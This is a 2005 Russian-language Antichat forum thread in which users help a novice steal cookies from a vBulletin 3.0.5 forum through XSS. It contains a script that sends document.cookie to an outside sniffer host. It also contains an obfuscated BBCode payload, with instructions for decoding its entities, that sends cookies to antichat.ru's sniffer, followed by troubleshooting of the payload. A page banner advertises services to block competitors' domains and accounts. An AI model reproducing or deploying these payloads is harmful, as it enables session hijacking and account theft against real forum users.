Форум АНТИЧАТ - XSS на Bulletin Version 3.0.5

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
XSS на Bulletin Version 3.0.5

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

XSS на Bulletin Version 3.0.5

13.12.2005, 00:09

~~Extrim~~

Banned

Регистрация: 13.11.2005

Сообщений: 26

Провел на форуме:
204359

Репутация: -6

XSS на Bulletin Version 3.0.5

Скажите пожалуста как код снифера встовлять в тему......
Вот например код

Код:

<script>img=new Image(); img.src="http://s.netsec.ru//s.gif?id=591&"+document.cookie;</script>

и все или что то надо менять в этом коде ???
Ответти мне на этот вопрос пожалуста..Я со снифером первый раз роботаю !

13.12.2005, 00:21

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

В какую тему и какого форума ты это вставлять собрался? Адрес твоего сниффера нужно вставлять в Код Xss специальный для твоей версии форума. А ЭТО просто пример того, как можно украсть куки, но долеко не та конструкция с помощью которой это надо делать=)) Скажи что за форум?

13.12.2005, 00:31

~~Extrim~~

Banned

Регистрация: 13.11.2005

Сообщений: 26

Провел на форуме:
204359

Репутация: -6

Powered by: vBulletin Version 3.0.5
Помогите плиз

13.12.2005, 01:02

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

Код HTML:

[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]

Вот попробуй. Только удали плюсы из спец. символов, чтобы работало. Закодирован пол сниффер античата.

13.12.2005, 01:16

~~Extrim~~

Banned

Регистрация: 13.11.2005

Сообщений: 26

Провел на форуме:
204359

Репутация: -6

***************************

PHP код:


		
			
[URL=wj[url]http://www.][FONT=Arial style=display:none; style=background:url(javascript:document.&+#105;m&+#97;ges[1].src="http:/&47;antichat&+#46;ru/cgi-&+#98;in/s.jpg?"+document.cookie;)  / ]wj [/url][/FONT][/URL]

***********************************
Вот-так ??Я плюсы убрал...если нетак плиз розкажи как надо я просто хочю попробывать на зуб XSS

Последний раз редактировалось Extrim; 13.12.2005 в 01:22..

13.12.2005, 01:21

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Отправить сообщение для Romaxa55 с помощью ICQ

Ну все, вставляй и иди на лог античата. ток вроде плюсы не везде убрал

13.12.2005, 01:21

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

Цитата:

Вот-так ??Я плюсы убрал...

Мне что, за тебя плюсики уберать? И ГДЕ Ж ТЫ ПЛЮСЫ-ТО убрал????
Я сказал плюсы убрать только в спец. символах! Пример. Было &+#58, а становится просто &#58, понятно??? Я не знаю, как ещё проще объяснить....
Не забываем про репутацию

13.12.2005, 01:37

$ZLO$

Участник форума

Регистрация: 15.01.2005

Сообщений: 119

Провел на форуме:
250370

Репутация: 16

а куда конкретно его вставлять в свой пост? и канает ли данная XSS в vBulletin v3.5.2 ?

13.12.2005, 01:50

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

Extrim Ты не все плюсы убрал!!! Со зрением чтоли плохо? Со второй попытки и то не все=)))

Цитата:

Сообщение от $ZLO$

канает ли данная XSS в vBulletin v3.5.2 ?

Нет.

#10

13.12.2005, 03:51

cardons

Познавший АНТИЧАТ

Регистрация: 19.07.2005

Сообщений: 1,000

Провел на форуме:
5868159

Репутация: 950

А у кого нить есть этот декодер,чтобы так же делать из букв в такие коды?

Последний раз редактировалось cardons; 13.12.2005 в 04:46..

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Сплоит для vBulletin Version 3.0.5	Extrim	Форумы	2	23.11.2005 01:12
How can i learn PHPBB version??	k3pch3	Forum for discussion of ANTICHAT	4	19.11.2005 01:25
File version info	NaX[no]rT	АнтиАдмин	2	23.09.2005 17:18

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход